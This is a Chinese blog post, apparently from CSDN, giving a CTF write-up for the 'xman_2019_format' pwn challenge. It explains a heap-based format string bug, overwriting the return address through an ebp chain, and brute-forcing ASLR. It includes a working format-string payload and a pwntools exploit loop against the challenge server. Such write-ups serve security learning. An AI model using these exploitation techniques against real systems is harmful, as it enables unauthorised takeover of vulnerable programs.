xman_2019_format

于 2023-03-21 20:50:34 发布
阅读量97 收藏
点赞数
分类专栏: pwn刷题 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73756460/article/details/129697311
版权
文章描述了一个32位程序,启用了NX保护,存在backdoor函数。作者探讨了如何通过栈溢出和地址篡改绕过ASLR,利用ebp链改变EIP,注入payload,最终使得程序跳转到后门函数来获取flag。通过爆破获取正确地址,构造payload实现了对程序的exploit。
摘要由CSDN通过智能技术生成

xman_2019_format

惯例先checksec一下

请添加图片描述

开启了NX保护的32位程序 放进ida里看看

存在backdoor函数

请添加图片描述

其中main函数跳转到vuln函数再不断跳转 就不把所有的都放出来了 直接取有用的部分放上来

vuln1:

请添加图片描述

vuln3

请添加图片描述
由于我们此时的字符串存放在堆上因此我们不能通过%k$n的方法根据偏移实现任意地址写

那么我们就考虑利用ebp链来讲eip中的内容篡改为我们的后门地址

第一步找到偏移偏移为10, 将0xffa44088(ebp链)改为0xffa4403c(栈上返回地址所在的位置)也就是指向eip的地址, 不过由于地址随机化,只需要改最后两位保证最后为C就好, 我这里是0x0C, 当然 1C、2C、3C…都可以 )

第二步找到偏移偏移为18,将804864b改为0x80485AB也就是我们的后门函数的地址 这样就可以成功获取到flag了。

32位的ASLR实际只将地址的倒数第二位变为了随机数因此我们可以利用爆破来获取正确的地址

payload = '%12c' + '%10$hhn|'    #利用%n将0xffa44038中存放的地址0xffa44058中的内容0xffa44088的最后一位改为c即0xffa4400c(该地址中存放了返回地址)
payload += '%34219c' + '%18$hn' #利用%n将0xffa44058中的地址(由于上一次修改已被修改为了0xffa4400c)中的内容0x804864b的最后四位篡改为85ab(即0x80485AB) 这样我们就达成了将返回地址篡改为后门函数的地址的目的

请添加图片描述

exp:

from pwn import *
while 1:                                 
    #io = process("./xman_2019_format")  
    io = remote("node4.buuoj.cn",28254)
    payload = '%12c' + '%10$hhn|' + '%34219c' + '%18$hn'      
    io.sendline(payload)                 
    try:                                  	
       	io.interactive()                 
    except:                              
       	io.close()
爱若 AI_ruo
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Unicode-XMan.rar_beta
09-24
**Unicode-XMan.rar_beta** 是一个压缩包,包含 **Unicode XMan Version 1.0 Beta (20090910)** 的资源,主要用于查看和理解Unicode字符。这个工具是一个早期的测试版本,发布于2009年9月10日,旨在帮助用户探索...
xman_2019_format(非栈上格式化字符串仅一次利用的爆破)
seaaseesa的博客
04-30 1492
xman_2019_format 首先检查一下程序的保护机制 然后用IDA分析一下 存在一个后门函数 s执行的内存是非栈上,这类格式化字符串漏洞,一般需要先泄露栈地址,但是这里无法做到,如果泄露了,第二次也没机会来再次利用了。因为这里是一次输入,分步执行。没有循环的交互。因此,最简单的方法是爆破栈的低1字节。通过栈上已有的数据,在栈上布下一个指向函数返回地址栈的指针,然后劫持返回地...
[BUUCTF]PWN——xman_2019_format(堆上的fmt+爆破栈)
mcmuyanga的博客
03-22 615
xman_2019_format 例行检查,32位程序,开启了nx 检索程序里的字符串,发现了后门函数,back_doorr=0x80485AB 这题buf并不存储在栈上,而是在malloc申请的堆上 之后buf作为参数,进入到sub_80485C4 由于存在后门函数,可以利用格式化字符串将返回地址改为back_door 这边主要利用了%ac$bn,将长度a的数据写入偏移为b的位置。 格式化字符串漏洞,一般需要先泄露栈地址,然后计算偏移,但是这里没办法这么利用,因为这里的s存放在chunk上,不在
taobao_cookieman:定时登陆淘宝获取有效cookie
07-05
taobao_cookieman ...文件: login_robot.py 提供Restful服务 template/login-cfg.ctp 配置模板基本不用更改 template/platform_login.ctp 爬虫脚本模板,通过配置后生成 ${店铺名}_login.js 爬虫文件 ...
Xman非常好用
07-30
Xman:一款高效实用的软件工具》 Xman,这款被誉为“非常好用”的软件工具,无疑在IT领域中占据了一席之地。它以其强大的功能和便捷的操作性赢得了用户的广泛赞誉。然而,作为一位负责任的IT专业人士,我们需要...
PDFOnCloud_setup.exe
06-21
很好用的制作pdf工具,很小,很好用的软件。不占资源,制作的pdf兼容性好,操作简单,用过后别的pdf制作软件都可以卸载了。
第四届Xman个人排位赛流量分析之strange_ssid复现
12-29
第四届Xman个人排位赛流量分析之strange_ssid复现 查找SSID找到一个md5,爆破之,得flag{n3k0}
[BUUCTF-pwn]——xman_2019_format
Y_peak的博客
03-30 527
[BUUCTF-pwn]——xman_2019_format 本小白终于想明白了, 第一个写出来这道题的人, 好厉害感觉. 脑袋嗡嗡的, 这道题让我想了一个上午竟然, 果然适当睡眠有助于思考, 睡一觉就想出来了. 也看过几个题解不过,虽然解法相同,但是基本都木有将清楚, 每一步的原因是什么都木有说清楚. peak不才, 在这里试着详细说明一下, 毕竟想了一个上午的东西,还是有必要好好总结一下的 . peak小知识 ALSR : 你们肯定都知道,不就是地址随机化嘛有什么, 但是这道题如果你们不清楚具体的原理
xman_2019_format(非栈上格式化字符串仅一次利用的爆破)
m0_51251108的博客
11-10 655
xman_2019_format: 看名字是格式化字符串 checksec一下 在printf处 程序分析: 有个后门 想着就是把printf,劫持为后门
BUUCTF-PWN刷题记录-18(格式化字符串漏洞)
weixin_44145820的博客
05-08 1714
目录xman_2019_format(字符串位于堆上)hitcontraining_playfmt(字符串位于bss)wustctf2020_babyfmt xman_2019_format(字符串位于堆上) 一道格式化字符串题目,但是只有一次输入机会,但是有多次利用机会,每次利用使用‘|’隔开 我们先看一下栈的情况 经过多次调试,可以发现返回地址最低一个16进制位一定为0xC,我们只需要爆破倒数第二个16进制位就能得到指向返回地址的栈上地址 Exp: from pwn import * #r =
xmanctf_2019_crypto_cycle_write_up
WaterDemo22的专栏
12-31 555
一道xmanctf逆向题目的解答 周末试了试xmanctf的题目,试了一下crypto的cycle那一题,逻辑逆向难度不是很大。主要是对于逆向出来对逻辑,整理成解题思路的过程有点繁琐,需要对程序的精细化处理。分为三个步骤:编码、跳表处理和约束求解,具体分析如下。 编码 对输入字符进行编码,编码算法是: 关键逻辑是有两个: v2 = byte_202020[i] + v4 –s s[i]...
BUUCTF之“xman_2019_format”之特殊剧情:当格式化字符串遇上堆
Probeginner的博客
12-24 463
格式化字符串在遇到堆的情况
某道Pwn(格式化字符串漏洞)
热门推荐
龙哥盟
03-18 4万+
格式化字符串漏洞近几年出现频率少了,但是一些 CTF 中还有涉及,就当玩玩好了。首先看这一段代码,什么比赛的题我忘了:#include <stdio.h> int main(void) { int flag = 0; int *p = &flag; char a[100]; scanf("%s",a); printf(a); if(flag ==
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8390
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
农牧集团企业数字化建设总体规划SAP解决方案参考.pdf
最新发布
08-17
农牧集团企业数字化建设总体规划SAP解决方案参考.pdf
java基于ssm+jsp软件工程项目管理系统源码 带毕业论文
08-17
【资源说明】 1、开发环境:ssm框架;内含Mysql数据库;JSP技术 2、该资源包括项目的全部源码,下载可以直接使用! 3、本项目适合作为计算机、数学、电子信息等专业的课程设计、期末大作业和毕设项目,作为参考资料学习借鉴。 4、本资源作为“参考资料”如果需要实现其他功能,需要能看懂代码,并且热爱钻研,自行调试。
XMAN := xman -prj ${PRJ_NAME}详细解释解释上述makefile
04-28
这是一个 Makefile 中的变量赋值语句,它将 xman 变量的值设置为 `${PRJ_NAME}` 变量的值,并在变量名称前添加了 `-prj` 前缀。这个 Makefile 似乎是为了某个工程项目(即 `${PRJ_NAME}`)而编写的,XMAN 变量可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值